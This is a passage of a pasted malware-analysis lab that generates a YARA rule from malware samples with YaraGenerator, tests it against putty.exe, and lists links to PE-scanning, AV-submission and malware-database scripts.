  2224.  
  2225. yara rules/ malcode/malware.exe
  2226.  
  2227. wget https://github.com/Xen0ph0n/YaraGenerator/archive/master.zip
  2228.  
  2229. unzip master.zip
  2230.  
  2231. cd YaraGenerator-master/
  2232.  
  2233. python yaraGenerator.py ../malcode/ -r Test-Rule-2 -a "Joe McCray" -d "Test Rule Made With Yara Generator" -t "TEST" -f "exe"
  2234.  
  2235. cat Test-Rule-2.yar
  2236.  
  2237. wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  2238.  
  2239. yara Test-Rule-2.yar putty.exe
  2240.  
  2241.  
  2242.  
  2243.  
  2244.  
  2245.  
  2246.  
  2247.  
  2248.  
  2249.  
  2250.  
  2251.  
  2252.  
  2253.  
  2254. ####################
  2255. # Additional Tasks #
  2256. ####################
  2257.  
  2258. - PE Scanner:
  2259. https://malwarecookbook.googlecode.com/svn/trunk/3/8/pescanner.py
  2260. http://www.beenuarora.com/code/analyse_malware.py
  2261.  
  2262. - AV submission:
  2263. http://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
  2264. https://raw.githubusercontent.com/dcmorton/MalwareTools/master/vtsubmit.py
  2265.  
  2266. - Malware Database Creation:
  2267. https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top